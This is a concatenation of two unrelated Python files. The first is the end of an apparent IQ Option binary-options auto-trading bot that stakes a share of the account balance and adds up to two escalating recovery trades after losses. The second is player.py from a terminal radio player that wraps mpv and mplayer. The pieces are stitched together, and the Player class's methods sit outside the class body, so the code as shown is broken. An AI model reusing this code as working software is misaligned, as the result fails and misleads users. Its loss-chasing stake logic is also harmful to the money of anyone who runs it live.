        if cores.count('r') < color_candles:
            direction = 'call'
        elif cores.count('g') < color_candles:
            direction = 'put'
    return direction
def get_initial_amount(iqoapi, active, amount_by_payout):
    """Stake size: a payout-dependent percentage of the current balance."""
    saldo = get_balance(iqoapi)
    payout_key = str(get_payout(iqoapi, active))
    fraction = float(amount_by_payout[payout_key]) / 100
    return round(fraction * saldo, 2)
def run_auto_bo(active, email, pwd):
    """
    Worker entry point (one process per traded asset).

    Connects to IQ Option, then loops forever: computes the stake from the
    current payout, asks the MHI strategy for a direction and, inside the
    entry time window, places the trade plus up to two recovery trades.

    :param active: asset symbol, e.g. 'EURUSD'
    :param email: IQ Option account login
    :param pwd: IQ Option account password
    """
    # Connect to IQOption
    iqoapi = IQ_Option(email, pwd)
    iqoapi.connect()
    # Account type REAL, PRACTICE
    acc_type = 'PRACTICE'
    iqoapi.change_balance(acc_type)  # PRACTICE / REAL
    operacao = 1
    # retry until the connection is actually up
    while True:
        if not iqoapi.check_connect():
            print('Connection error')
            iqoapi.connect()
        else:
            print('\n\nConnection success!')
            break
        time.sleep(1)
    # stake (% of balance, as strings) to use for a given payout fraction
    amount_by_payout = {'0.74': '0.99', '0.75': '0.97', '0.76': '0.96', '0.77': '0.94', '0.78': '0.93', '0.79': '0.91',
                        '0.80': '0.90', '0.81': '0.88', '0.82': '0.87', '0.83': '0.85', '0.84': '0.84', '0.85': '0.83',
                        '0.86': '0.82', '0.87': '0.80', '0.88': '0.79', '0.89': '0.78', '0.90': '0.77', '0.91': '0.76',
                        '0.92': '0.75', '0.93': '0.74', '0.94': '0.73', '0.95': '0.72', '0.96': '0.71', '0.97': '0.70',
                        '0.98': '0.69', '0.99': '0.68', '100': '0.67'}
    direction = None
    lucro_total = 0
    while True:
        print('Iniciando processamento para ', active)
        initial_amount = get_initial_amount(iqoapi, active, amount_by_payout)
        print('Initial amount ', initial_amount)
        direction = mhi_strategy(iqoapi, active)
        print("deu direction ", direction)
        lucre_opera = 0
        # minutes.seconds of the wall clock with the tens digit dropped,
        # i.e. position inside a repeating 10-minute cycle
        minutos = float(((datetime.now()).strftime('%M.%S'))[1:])
        # enter only in the last ~2s before each 5-minute boundary
        entrar = True if (4.58 <= minutos <= 5) or minutos >= 9.58 else False
        if entrar:
            while True:
                #verifica velas
                status, valor = entradas(iqoapi, active, initial_amount, direction, 1)
                lucro_total += valor
                if status and valor < 0:
                    # loss: try to recover half the loss per step, twice
                    perda = abs(valor)
                    for i in range(2):
                        if lucre_opera >= perda:
                            break
                        if direction:
                            status, valor_soros = entradas(iqoapi, active, (perda / 2) + lucre_opera, direction, 1)
                            if status:
                                if valor_soros > 0:
                                    lucre_opera += round(valor_soros, 2)
                                else:
                                    lucre_opera = 0
                                    perda += round(abs(valor_soros), 2) / 2
                print('Resultado operação: ', end='')
                print('WIN /' if valor > 0 else 'LOSS /', round(valor, 2), '/', round(lucre_opera, 2),
                      ('/ ' + str(i) + ' GALE' if i > 0 else ''))
# Load the settings from config.txt (runs at import time)
config = configuracao()
if __name__ == '__main__':
    # keep numeric libraries single-threaded; parallelism comes from processes
    os.environ['MKL_NUM_THREADS'] = '1'
    os.environ['OMP_NUM_THREADS'] = '1'
    os.environ['MKL_DYNAMIC'] = 'FALSE'
    expiration = 5
    actives = {expiration: ('EURUSD',)}
    email = config['login']
    pwd = config['password']
    # one worker process per traded asset
    for expiration_time, active_list in actives.items():
        for active in active_list:
            Process(target=run_auto_bo, args=(active, email, pwd)).start()
|
player.py | # -*- coding: utf-8 -*-
import subprocess
import threading
import os
import logging
from os.path import expanduser
from sys import platform, version_info
from sys import exit
from time import sleep
import json
import socket
logger = logging.getLogger(__name__)
class Player(object):
    """ Media player class. Playing is handled by player sub classes """
    # Popen handle of the spawned backend player process
    process = None
    # prefix shown before an ICY (stream metadata) title
    icy_title_prefix = 'Title: '
    title_prefix = ''
    # Input: old user input - used to early suppress output
    # in case of consecutive equal messages
    # Volume: old volume input - used to suppress output (and firing of delay thread)
    # in case of consecutive equal volume messages
    # Title: old title input - printed by delay thread
    oldUserInput = {'Input': '', 'Volume': '', 'Title': ''}
    """ volume percentage """
    volume = -1
    # thread that delays re-printing the title after a volume message
    delay_thread = None
    # timer that fires playback_timeout_handler when no playback starts
    connection_timeout_thread = None
    """ make it possible to change volume but not show it """
    show_volume = True
    muted = False
    status_update_lock = threading.Lock()
    ctrl_c_pressed = False
    """ When found in station transmission, playback is on """
    _playback_token_tuple = ( 'AO: [', )
    playback_is_on = False
    _station_encoding = 'utf-8'
    # used to stop mpv update thread on python3
    stop_mpv_status_update_thread = False
def __init__(self, outputStream, playback_timeout, playback_timeout_handler):
    """
    :param outputStream: object used to display status messages
    :param playback_timeout: seconds to wait for playback to start;
        falls back to 10 when it cannot be parsed as an int
    :param playback_timeout_handler: callback fired on connection timeout
    """
    self.outputStream = outputStream
    try:
        self.playback_timeout = int(playback_timeout)
    except (TypeError, ValueError):
        # narrowed from a bare "except:" which also hid real errors;
        # only parse failures should fall back to the default
        self.playback_timeout = 10
    self.playback_timeout_handler = playback_timeout_handler
def __del__(self):
    # make sure the spawned player process is shut down when the
    # Player is garbage collected (close() is defined outside this view)
    self.close()
def save_volume(self):
    """No-op base implementation; backend sub classes persist the volume."""
    pass
def _do_save_volume(self, config_string):
    """
    Write the current volume into the backend player's config file.

    Windows configs get a plain "volume=" line replaced/appended; on other
    platforms the volume is written inside the "[pyradio]" profile section
    (creating the profile, and the config directory, if needed).

    :param config_string: template for a brand-new profile; on some code
        paths it is re-bound to the file's current contents before writing
    :return: a human-readable status message (one of ret_strings)
    """
    if not self.config_files:
        if logger.isEnabledFor(logging.DEBUG):
            logger.debug('Volume not saved!!! (config file not found!!!)')
        return 'Volume not saved!!!'
    ret_strings = ('Volume: already saved...',
                   'Volume: {}% saved',
                   'Volume: {}% NOT saved (Error writing file)',
                   'Volume: NOT saved!')
    log_strings = ('Volume is -1. Aborting...',
                   'Volume is {}%. Saving...',
                   'Error saving profile "{}"',
                   'Error saving volume...')
    # volume == -1 means "unchanged since last save"; -2 means "invalid"
    if self.volume == -1:
        """ inform no change """
        if (logger.isEnabledFor(logging.DEBUG)):
            logger.debug(log_strings[0])
        return ret_strings[0]
    elif self.volume == -2:
        if (logger.isEnabledFor(logging.DEBUG)):
            logger.debug(log_strings[3])
        return ret_strings[3]
    else:
        """ change volume """
        if (logger.isEnabledFor(logging.DEBUG)):
            logger.debug(log_strings[1].format(self.volume))
        profile_found = False
        config_file = self.config_files[0]
        ret_string = ret_strings[1].format(str(self.volume))
        if os.path.exists(config_file):
            if platform.startswith('win'):
                # Windows: flat config, just replace/append a volume= line
                with open(config_file, 'r') as c_file:
                    config_string = c_file.read()
                if "volume=" in config_string:
                    vol = config_string.splitlines()
                    for i, v_string in enumerate(vol):
                        if v_string.startswith('volume'):
                            vol[i] = 'volume={}'.format(self.volume)
                            break
                    config_string = '\n'.join(vol)
                else:
                    out = config_string + 'volume={}'.format(self.volume)
                    config_string = out
                try:
                    with open(config_file, "w") as c_file:
                        c_file.write(config_string)
                    self.volume = -1
                    self.PROFILE_FROM_USER = True
                except:
                    if (logger.isEnabledFor(logging.DEBUG)):
                        logger.debug(log_strings[2].format(config_file))
                    return ret_strings[2].format(str(self.volume))
            else:
                # non-Windows: volume lives inside the [pyradio] profile
                if self.PROFILE_FROM_USER:
                    with open(config_file, 'r') as c_file:
                        config_string = c_file.read()
                    if "[pyradio]" in config_string:
                        profile_found = True
                        """ split on [pyradio]
                            last item has our options """
                        sections = config_string.split("[pyradio]")
                        """ split at [ - i.e. isolate consecutive profiles
                            first item has pyradio options """
                        py_section = sections[-1].split("[")
                        """ split to lines in order to get '^volume=' """
                        py_options = py_section[0].split("\n")
                        """ replace volume line """
                        vol_set = False
                        for i, opt in enumerate(py_options):
                            if opt.startswith("volume="):
                                py_options[i]="volume=" + str(self.volume)
                                vol_set = True
                                break
                        """ or add it if it does not exist """
                        if not vol_set:
                            py_options.append("volume=" + str(self.volume))
                        """ join lines together in py_section's first item """
                        py_section[0] = "\n".join(py_options)
                        """ join consecutive profiles (if exist)
                            in last item of sections """
                        if len(py_section) > 1:
                            sections[-1] = "[".join(py_section)
                        else:
                            sections[-1] = py_section[0]
                        """ finally get the string back together """
                        config_string = "[pyradio]".join(sections)
                        try:
                            with open(config_file, "w") as c_file:
                                c_file.write(config_string)
                            self.volume = -1
                        except EnvironmentError:
                            if (logger.isEnabledFor(logging.DEBUG)):
                                logger.debug(log_strings[2].format(config_file))
                            return ret_strings[2].format(str(self.volume))
        """ no user profile or user config file does not exist """
        if not profile_found:
            if not os.path.isdir(os.path.dirname(config_file)):
                try:
                    os.mkdir(os.path.dirname(config_file))
                except OSError:
                    if (logger.isEnabledFor(logging.DEBUG)):
                        logger.debug(log_strings[2].format(config_file))
                    return ret_strings[2].format(str(self.volume))
            # caller-supplied template gets a default volume line prepended,
            # then the volume value formatted in on write
            new_profile_string = "volume=100\n\n" + config_string
            try:
                with open(config_file, "a") as c_file:
                    c_file.write(new_profile_string.format(str(self.volume)))
            except EnvironmentError:
                if (logger.isEnabledFor(logging.DEBUG)):
                    logger.debug(log_strings[2].format(config_file))
                return ret_strings[2].format(str(self.volume))
            self.volume = -1
            self.PROFILE_FROM_USER = True
        return ret_string
def _is_in_playback_token(self, a_string):
    """Return True when *a_string* contains any token that marks the
    start of playback (see _playback_token_tuple)."""
    return any(token in a_string for token in self._playback_token_tuple)
def updateStatus(self, *args):
    """
    Reader thread for the backend player's stdout.

    Parses each line for volume changes, playback-start tokens and ICY
    title metadata, and forwards formatted status strings to
    self.outputStream. args[0] is passed through to outputStream.write
    (presumably a lock or window handle — confirm against caller).
    """
    has_error = False
    if (logger.isEnabledFor(logging.DEBUG)):
        logger.debug("updateStatus thread started.")
    try:
        out = self.process.stdout
        while(True):
            subsystemOutRaw = out.readline()
            try:
                subsystemOut = subsystemOutRaw.decode(self._station_encoding, "replace")
            except:
                # fall back to UTF-8 when the station encoding is unusable
                subsystemOut = subsystemOutRaw.decode("utf-8", "replace")
            if subsystemOut == '':
                # EOF: player process closed its stdout
                break
            if not self._is_accepted_input(subsystemOut):
                continue
            subsystemOut = subsystemOut.strip()
            subsystemOut = subsystemOut.replace("\r", "").replace("\n", "")
            # only react when the line differs from the previous one
            if self.oldUserInput['Input'] != subsystemOut:
                if (logger.isEnabledFor(logging.DEBUG)):
                    if version_info < (3, 0):
                        disp = subsystemOut.encode('utf-8', 'replace').strip()
                        logger.debug("User input: {}".format(disp))
                    else:
                        logger.debug("User input: {}".format(subsystemOut))
                self.oldUserInput['Input'] = subsystemOut
                if self.volume_string in subsystemOut:
                    # disable volume for mpv
                    if self.PLAYER_CMD != "mpv":
                        #logger.error("***** volume")
                        if self.oldUserInput['Volume'] != subsystemOut:
                            self.oldUserInput['Volume'] = subsystemOut
                            self.volume = ''.join(c for c in subsystemOut if c.isdigit())
                            # IMPORTANT: do this here, so that cvlc actual_volume
                            # gets updated in _format_volume_string
                            string_to_show = self._format_volume_string(subsystemOut) + self._format_title_string(self.oldUserInput['Title'])
                            if self.show_volume and self.oldUserInput['Title']:
                                self.outputStream.write(string_to_show, args[0])
                                self.threadUpdateTitle(args[0])
                elif self._is_in_playback_token(subsystemOut):
                    # playback started: cancel the connection timeout timer
                    if self.connection_timeout_thread is not None:
                        self.connection_timeout_thread.cancel()
                    if (logger.isEnabledFor(logging.INFO)):
                        logger.info('start of playback detected')
                    if self.outputStream.last_written_string.startswith('Connecting '):
                        new_input = self.outputStream.last_written_string.replace('Connecting to', 'Playing')
                        self.outputStream.write(new_input, args[0])
                        if self.oldUserInput['Title'] == '':
                            self.oldUserInput['Input'] = new_input
                        else:
                            self.oldUserInput['Title'] = new_input
                    self.playback_is_on = True
                elif self._is_icy_entry(subsystemOut):
                    #logger.error("***** icy_entry")
                    title = self._format_title_string(subsystemOut)
                    # only accept a non-empty title after the prefix
                    if title[len(self.icy_title_prefix):].strip():
                        self.oldUserInput['Title'] = subsystemOut
                        # make sure title will not pop-up while Volume value is on
                        ok_to_display = False
                        if self.delay_thread is None:
                            ok_to_display = True
                        else:
                            if (not self.delay_thread.isAlive()):
                                ok_to_display = True
                        if ok_to_display:
                            string_to_show = self.title_prefix + title
                            self.outputStream.write(string_to_show, args[0])
                    else:
                        if (logger.isEnabledFor(logging.INFO)):
                            logger.info('Icy-Title is NOT valid')
                else:
                    # any other first output: show a "Connecting" message once
                    if self.oldUserInput['Title'] == '':
                        self.oldUserInput['Title'] = 'Connecting to: "{}"'.format(self.name)
                        self.outputStream.write(self.oldUserInput['Title'])
    except:
        has_error = True
        if logger.isEnabledFor(logging.ERROR):
            logger.error("Error in updateStatus thread.", exc_info=True)
        return
    if (logger.isEnabledFor(logging.INFO)):
        logger.info("updateStatus thread stopped.")
def updateMPVStatus(self, *args):
    """Poll mpv's JSON IPC socket and update the displayed title.

    args[0] is the lock handed to outputStream.write(); args[1] is a
    callable that returns True when this thread must stop.  Started by
    play() for mpv on python 3.
    """
    if (logger.isEnabledFor(logging.INFO)):
        logger.info("MPV updateStatus thread started.")
    # Wait until mpv creates its IPC socket; bail out if asked to stop.
    # BUG FIX: the original wrapped the connect in try/finally with no
    # except clause and tested `sock` inside finally, where it could be
    # unbound on the first iteration if the connect raised.
    sock = None
    while True:
        sock = self._connect_to_socket(self.mpvsocket)
        if sock:
            break
        if args[1]():
            if (logger.isEnabledFor(logging.INFO)):
                logger.info("MPV updateStatus thread stopped (no connection to socket).")
            return
        sleep(.25)
    self.oldUserInput['Title'] = 'Connecting to: "{}"'.format(self.name)
    self.outputStream.write(self.oldUserInput['Title'], args[0])
    # Ask mpv to push metadata changes to us.
    message = b'{ "command": ["observe_property", 1, "filtered_metadata"] }\n'
    sock.sendall(message)
    GET_TITLE = b'{ "command": ["get_property", "filtered-metadata"] }\n'
    while True:
        if args[1]():
            break
        data = sock.recvmsg(4096)
        a_data = data[0] if isinstance(data, tuple) else data
        if a_data == b'' or args[1]():
            break
        if a_data:
            if b'"icy-title":"' in a_data:
                title = a_data.split(b'"icy-title":"')[1].split(b'"}')[0]
                if title:
                    try:
                        self.oldUserInput['Title'] = 'Title: ' + title.decode(self._station_encoding, "replace")
                    except:
                        # fall back to utf-8 when the station encoding is bogus
                        self.oldUserInput['Title'] = 'Title: ' + title.decode("utf-8", "replace")
                    string_to_show = self.title_prefix + self.oldUserInput['Title']
                    if args[1]():
                        break
                    self.outputStream.write(string_to_show, args[0])
                else:
                    if (logger.isEnabledFor(logging.INFO)):
                        logger.info('Icy-Title is NOT valid')
            else:
                # Not a title line: scan the JSON events mpv sent us.
                all_data = a_data.split(b'\n')
                for n in all_data:
                    try:
                        d = json.loads(n)
                        if 'event' in d.keys():
                            if d['event'] == 'metadata-update':
                                sock.sendall(GET_TITLE)
                            elif d['event'] == 'playback-restart':
                                if self.connection_timeout_thread is not None:
                                    self.connection_timeout_thread.cancel()
                                if (logger.isEnabledFor(logging.INFO)):
                                    logger.info('start of playback detected')
                                if self.outputStream.last_written_string.startswith('Connecting '):
                                    new_input = self.outputStream.last_written_string.replace('Connecting to', 'Playing')
                                    self.outputStream.write(new_input, args[0])
                                    if self.oldUserInput['Title'] == '':
                                        self.oldUserInput['Input'] = new_input
                                    else:
                                        self.oldUserInput['Title'] = new_input
                                self.playback_is_on = True
                    except:
                        # ignore partial / non-JSON lines
                        pass
    sock.close()
    if (logger.isEnabledFor(logging.INFO)):
        logger.info("MPV updateStatus thread stopped.")
def threadUpdateTitle(self, a_lock, delay=1):
    """Schedule a delayed (default 1 s) redraw of the current title.

    Cancels any pending redraw timer first, so only the latest title wins.
    Does nothing when no title has been received yet.
    """
    if self.oldUserInput['Title'] != '':
        if self.delay_thread is not None:
            # BUG FIX: camelCase isAlive() was removed in Python 3.9;
            # is_alive() exists since Python 2.6, so this stays compatible.
            if self.delay_thread.is_alive():
                self.delay_thread.cancel()
        try:
            self.delay_thread = threading.Timer(
                delay,
                self.updateTitle,
                [self.outputStream,
                 self.title_prefix + self._format_title_string(self.oldUserInput['Title']),
                 a_lock])
            self.delay_thread.start()
        except:
            if (logger.isEnabledFor(logging.DEBUG)):
                logger.debug("delay thread start failed")
def updateTitle(self, *arg, **karg):
    """Write a title to an output stream.

    arg[0]: output stream, arg[1]: string to display, arg[2]: lock.
    """
    stream, text, lock = arg[0], arg[1], arg[2]
    stream.write(text, lock)
def _is_icy_entry(self, a_string):
    """Return True when a_string contains any of this player's icy tokens."""
    return any(token in a_string for token in self.icy_tokkens)
def _format_title_string(self, title_string):
    """Format a raw title line for display; the base class only applies
    the ' - text="..."' tag collapsing."""
    formatted = self._title_string_format_text_tag(title_string)
    return formatted
def _title_string_format_text_tag(self, a_string):
    """Collapse a trailing ' - text="..."' tag into ': "..."'.

    If no tag is present the string is returned unchanged; if the part
    before the tag already equals icy_title_prefix + tag text, the tag
    is simply dropped.
    """
    tag_pos = a_string.find(' - text="')
    if tag_pos == -1:
        return a_string
    head = a_string[:tag_pos]
    tail = a_string[tag_pos + 9:]
    text_value = tail[:tail.find('"')]
    if head == self.icy_title_prefix + text_value:
        return head
    return head + ': "' + text_value + '"'
def _format_volume_string(self, volume_string):
    """Format a raw volume line for display; the base class defers to the
    text-tag formatter."""
    formatted = self._title_string_format_text_tag(volume_string)
    return formatted
def isPlaying(self):
    """Return True while a player subprocess exists."""
    return self.process is not None
def play(self, name, streamUrl, encoding=''):
    """Use a multimedia player to play a stream.

    Stops any previous playback, spawns the player subprocess, starts
    the status-update thread and a playback-detection timeout timer.
    `encoding` overrides the station's text encoding (default utf-8).
    """
    self.close()
    self.name = name
    self.oldUserInput = {'Input': '', 'Volume': '', 'Title': ''}
    self.muted = False
    self.show_volume = True
    self.title_prefix = ''
    self.playback_is_on = False
    self.outputStream.write('Station: "{}" - Opening connection...'.format(name), self.status_update_lock)
    if logger.isEnabledFor(logging.INFO):
        logger.info('Selected Station: "{}"'.format(name))
    self._station_encoding = encoding if encoding else 'utf-8'
    # Playlists are detected by the URL extension, ignoring any query string.
    # (Removed a dead "opts = []" that was immediately overwritten.)
    isPlayList = streamUrl.split("?")[0][-3:] in ['m3u', 'pls']
    opts = self._buildStartOpts(streamUrl, isPlayList)
    self.stop_mpv_status_update_thread = False
    if self.PLAYER_CMD == "mpv" and version_info > (3, 0):
        # python 3 + mpv: titles come from the IPC socket, stdout is unused
        self.process = subprocess.Popen(opts, shell=False,
                                        stdout=subprocess.DEVNULL,
                                        stdin=subprocess.DEVNULL,
                                        stderr=subprocess.DEVNULL)
        t = threading.Thread(target=self.updateMPVStatus, args=(self.status_update_lock, lambda: self.stop_mpv_status_update_thread))
    else:
        self.process = subprocess.Popen(opts, shell=False,
                                        stdout=subprocess.PIPE,
                                        stdin=subprocess.PIPE,
                                        stderr=subprocess.STDOUT)
        t = threading.Thread(target=self.updateStatus, args=(self.status_update_lock, ))
    t.start()
    # start playback check timer thread
    try:
        self.connection_timeout_thread = threading.Timer(self.playback_timeout, self.playback_timeout_handler)
        self.connection_timeout_thread.start()
    except:
        self.connection_timeout_thread = None
        if (logger.isEnabledFor(logging.ERROR)):
            logger.error("playback detection thread start failed")
    if logger.isEnabledFor(logging.INFO):
        logger.info("Player started")
def _sendCommand(self, command):
    """Send a keystroke command to the player through its stdin pipe."""
    if self.process is None:
        return
    try:
        if logger.isEnabledFor(logging.DEBUG):
            logger.debug("Command: {}".format(command).strip())
        self.process.stdin.write(command.encode('utf-8', 'replace'))
        self.process.stdin.flush()
    except:
        msg = "Error when sending: {}"
        if logger.isEnabledFor(logging.ERROR):
            logger.error(msg.format(command).strip(), exc_info=True)
def close(self):
    """Shut down playback and kill the player subprocess."""
    self._no_mute_on_stop_playback()
    # First close the subprocess
    self._stop()
    # Fallback cleanup: cancel helper timers and kill the process.
    if self.connection_timeout_thread is not None:
        self.connection_timeout_thread.cancel()
    if self.delay_thread is not None:
        self.delay_thread.cancel()
    if self.process is not None:
        if platform.startswith('win'):
            try:
                # BUG FIX: subprocess.Call does not exist; the resulting
                # AttributeError was silently swallowed, so Taskkill never
                # actually ran.  subprocess.call is the correct API.
                subprocess.call(['Taskkill', '/PID', '{}'.format(self.process.pid), '/F'])
            except:
                pass
        else:
            try:
                os.kill(self.process.pid, 15)
                self.process.wait()
            except ProcessLookupError:
                # process already gone
                pass
        self.process = None
def _buildStartOpts(self, streamUrl, playList):
    """Build the player command line; implemented by subclasses."""
    return None
def toggleMute(self):
    """Mute / unmute the player and refresh the displayed title."""
    if self.PLAYER_CMD == 'mpv':
        # mpv reports its own mute state back
        self.muted = self._mute()
    else:
        self.muted = not self.muted
        self._mute()
    if self.muted:
        if self.delay_thread is not None:
            self.delay_thread.cancel()
        self.title_prefix = '[Muted] '
        self.show_volume = False
    else:
        self.title_prefix = ''
        self.show_volume = True
    source = self.oldUserInput['Input'] if self.oldUserInput['Title'] == '' else self.oldUserInput['Title']
    self.outputStream.write(self.title_prefix + self._format_title_string(source))
def _mute(self):
    """Mute hook; concrete players override this."""
    return None
def _stop(self):
    """Stop hook; concrete players override this."""
    return None
def _get_volume(self):
    """Get volume, if the player can report it; overridden by subclasses."""
    return None
def volumeUp(self):
    """Increase volume (no-op while muted)."""
    if self.muted is True:
        return
    self._volume_up()
def _volume_up(self):
    """Volume-up hook; concrete players override this."""
    return None
def volumeDown(self):
    """Decrease volume (no-op while muted)."""
    if self.muted is True:
        return
    self._volume_down()
def _volume_down(self):
    """Volume-down hook; concrete players override this."""
    return None
def _no_mute_on_stop_playback(self):
    """Make sure the player does not stop muted, i.e. volume=0.
    Currently implemented for vlc only."""
    return None
def _is_accepted_input(self, input_string):
    """Filter hook letting subclasses reject player output lines.
    The default accepts every message (vlc overrides this)."""
    return True
class MpvPlayer(Player):
    """Implementation of Player object for MPV."""

    PLAYER_CMD = "mpv"

    # Lines containing any of these tokens are treated as icy-title
    # entries and get displayed after the first icy-title is received.
    icy_tokkens = ('icy-title: ', )

    # USE_PROFILE: -1 = not checked yet, 0 = do not use, 1 = use profile
    USE_PROFILE = -1

    # True if the profile comes from ~/.config/mpv/mpv.conf
    PROFILE_FROM_USER = False

    # String that marks a volume-change line in mpv's output
    volume_string = 'Volume: '

    config_files = [expanduser("~") + "/.config/mpv/mpv.conf"]
    if platform.startswith('darwin'):
        config_files.append("/usr/local/etc/mpv/mpv.conf")
    elif platform.startswith('win'):
        config_files[0] = os.path.join(os.getenv('APPDATA'), "mpv", "mpv.conf")
    else:
        # linux, freebsd, etc.
        config_files.append("/etc/mpv/mpv.conf")

    # Per-process IPC socket used to talk to mpv.
    mpvsocket = '/tmp/mpvsocket.{}'.format(os.getpid())
    if logger.isEnabledFor(logging.DEBUG):
        # BUG FIX: this statement executes at class-definition time, where
        # "self" does not exist; the original "self.mpvsocket" raised
        # NameError on import whenever DEBUG logging was enabled.
        logger.debug('mpv socket is "{}"'.format(mpvsocket))
    if os.path.exists(mpvsocket):
        # remove a stale socket left over from a crashed instance
        os.system("rm " + mpvsocket + " 2>/dev/null")

    # JSON IPC commands understood by _send_mpv_command()
    commands = {
        'volume_up': b'{ "command": ["cycle", "volume", "up"] }\n',
        'volume_down': b'{ "command": ["cycle", "volume", "down"] }\n',
        'mute': b'{ "command": ["cycle", "mute"] }\n',
        'pause': b'{ "command": ["pause"] }\n',
        'quit': b'{ "command": ["quit"]}\n',
    }

    def save_volume(self):
        """Save the current volume in the [pyradio] mpv profile.

        Saving Volume in Windows does not work; Profiles not supported...
        """
        # Guard against garbage parsed from mpv's output; -2 signals an
        # invalid value downstream.
        if int(self.volume) > 999:
            self.volume = -2
        return self._do_save_volume("[pyradio]\nvolume={}\n")

    def _configHasProfile(self):
        """Check if an mpv config has a [pyradio] entry / profile.

        Profile example:
            [pyradio]
            volume-max=300
            volume=50

        Returns 1 when found (setting PROFILE_FROM_USER for the user's own
        config), else 0.
        """
        for i, config_file in enumerate(self.config_files):
            if os.path.exists(config_file):
                with open(config_file) as f:
                    config_string = f.read()
                if "[pyradio]" in config_string:
                    if i == 0:
                        # index 0 is always the user's own config file
                        self.PROFILE_FROM_USER = True
                    return 1
        return 0

    def _buildStartOpts(self, streamUrl, playList=False):
        """Build the mpv command line for `streamUrl`.

        Newer mpv uses --input-ipc-server; older builds use
        --input-unix-socket, so probe which flag is supported first.
        """
        p = subprocess.Popen([self.PLAYER_CMD, "--input-ipc-server"],
                             stdout=subprocess.PIPE,
                             stdin=subprocess.PIPE,
                             shell=False)
        out = p.communicate()
        if "not found" not in str(out[0]):
            if logger.isEnabledFor(logging.DEBUG):
                logger.debug("--input-ipc-server is supported.")
            newerMpv = 1
        else:
            if logger.isEnabledFor(logging.DEBUG):
                logger.debug("--input-ipc-server is not supported.")
            newerMpv = 0
        http_url = streamUrl.replace('https://', 'http://')
        if playList:
            if newerMpv:
                opts = [self.PLAYER_CMD, "--quiet", "--playlist=" + http_url, "--input-ipc-server=" + self.mpvsocket]
            else:
                opts = [self.PLAYER_CMD, "--quiet", "--playlist=" + http_url, "--input-unix-socket=" + self.mpvsocket]
        else:
            if newerMpv:
                opts = [self.PLAYER_CMD, "--quiet", http_url, "--input-ipc-server=" + self.mpvsocket]
            else:
                opts = [self.PLAYER_CMD, "--quiet", http_url, "--input-unix-socket=" + self.mpvsocket]
        if self.USE_PROFILE == -1:
            self.USE_PROFILE = self._configHasProfile()
        if self.USE_PROFILE == 1:
            opts.append("--profile=pyradio")
            if (logger.isEnabledFor(logging.DEBUG)):
                logger.debug("using profile [pyradio]")
        return opts

    def _mute(self):
        """Toggle mpv mute (retrying until the command goes through) and
        return the resulting mute state."""
        ret = self._send_mpv_command('mute')
        while not ret:
            ret = self._send_mpv_command('mute')
        return self._get_mute_status()

    def _get_mute_status(self):
        """Query mpv's "mute" property over the IPC socket.

        Loops until a boolean answer arrives.
        NOTE(review): this blocks forever if mpv never answers, and assumes
        _connect_to_socket succeeds — confirm callers only use it while mpv
        is alive.
        """
        while True:
            sock = self._connect_to_socket(self.mpvsocket)
            sock.sendall(b'{ "command": ["get_property", "mute"] }\n')
            # wait for response
            if version_info < (3, 0):
                data = sock.recv(4096)
            else:
                data = sock.recvmsg(4096)
            if isinstance(data, tuple):
                a_data = data[0]
            else:
                a_data = data
            if a_data:
                all_data = a_data.split(b'\n')
                for n in all_data:
                    try:
                        d = json.loads(n)
                        if d['error'] == 'success':
                            if isinstance(d['data'], bool):
                                sock.close()
                                return d['data']
                    except:
                        # ignore partial / non-JSON lines
                        pass

    def pause(self):
        """ pause streaming (if possible) """
        self._send_mpv_command('pause')

    def _stop(self):
        """ exit pyradio (and kill mpv instance) """
        self.stop_mpv_status_update_thread = True
        self._send_mpv_command('quit')
        os.system("rm " + self.mpvsocket + " 2>/dev/null")

    def _volume_up(self):
        """ increase mpv's volume """
        self._send_mpv_command('volume_up')
        self._display_mpv_volume_value()

    def _volume_down(self):
        """ decrease mpv's volume """
        self._send_mpv_command('volume_down')
        self._display_mpv_volume_value()

    def _format_title_string(self, title_string):
        """ format mpv's title """
        return self._title_string_format_text_tag(title_string.replace(self.icy_tokkens[0], self.icy_title_prefix))

    def _format_volume_string(self, volume_string):
        """ format mpv's volume """
        return '[' + volume_string[volume_string.find(self.volume_string):].replace('ume', '')+'] '

    def _connect_to_socket(self, server_address):
        """Return a connected UNIX socket to mpv, or None on failure."""
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        try:
            sock.connect(server_address)
            return sock
        except socket.error:
            sock.close()
            return None

    def _send_mpv_command(self, a_command):
        """Send a named IPC command to mpv.

        Returns True when the command was written (the response is read and
        discarded), False when the socket could not be opened, None for an
        unknown command name.
        """
        if a_command in self.commands.keys():
            sock = self._connect_to_socket(self.mpvsocket)
            if sock is None:
                return False
            # Send data
            sock.sendall(self.commands[a_command])
            # read (and discard) the response so mpv's buffer stays clean
            if version_info < (3, 0):
                data = sock.recv(4096)
            else:
                data = sock.recvmsg(4096)
            sock.close()
            return True

    def _display_mpv_volume_value(self):
        """Fetch mpv's "volume" property over the socket and show it next
        to the current title.

        Currently working with python 2 and 3; python 2 cannot correctly
        read icy-title from the socket (unicode issue), so it has to read
        it from stdout.
        """
        vol = 0
        while True:
            sock = self._connect_to_socket(self.mpvsocket)
            if sock:
                break
            sleep(.25)
        # Send data
        message = b'{ "command": ["get_property", "volume"] }\n'
        sock.sendall(message)
        # wait for response; loop until an integer volume is parsed
        got_it = True
        while got_it:
            if version_info < (3, 0):
                data = sock.recv(4096)
            else:
                data = sock.recvmsg(4096)
            if isinstance(data, tuple):
                a_data = data[0]
            else:
                a_data = data
            if a_data == b'':
                break
            if data:
                all_data = a_data.split(b'\n')
                for n in all_data:
                    try:
                        d = json.loads(n)
                        if d['error'] == 'success':
                            try:
                                vol = int(d['data'])
                                got_it = False
                                break
                            except:
                                pass
                    except:
                        pass
        sock.close()
        if self.oldUserInput['Title']:
            info_string = self._format_title_string(self.oldUserInput['Title'])
        else:
            info_string = self._format_title_string(self.oldUserInput['Input'])
        string_to_show = self._format_volume_string('Volume: ' + str(vol) + '%') + info_string
        self.outputStream.write(string_to_show)
        self.threadUpdateTitle(self.status_update_lock)
        self.volume = vol
class MpPlayer(Player):
    """Implementation of Player object for MPlayer."""

    PLAYER_CMD = "mplayer"

    # Lines containing any of these tokens are treated as icy-title
    # entries and get displayed after the first icy-title is received.
    icy_tokkens = ('ICY Info:', )

    # USE_PROFILE: -1 = not checked yet, 0 = do not use, 1 = use profile
    USE_PROFILE = -1

    # True if the profile comes from ~/.mplayer/config
    PROFILE_FROM_USER = False

    # String that marks a volume-change line in mplayer's output
    volume_string = 'Volume: '

    config_files = [expanduser("~") + "/.mplayer/config"]
    if platform.startswith('darwin'):
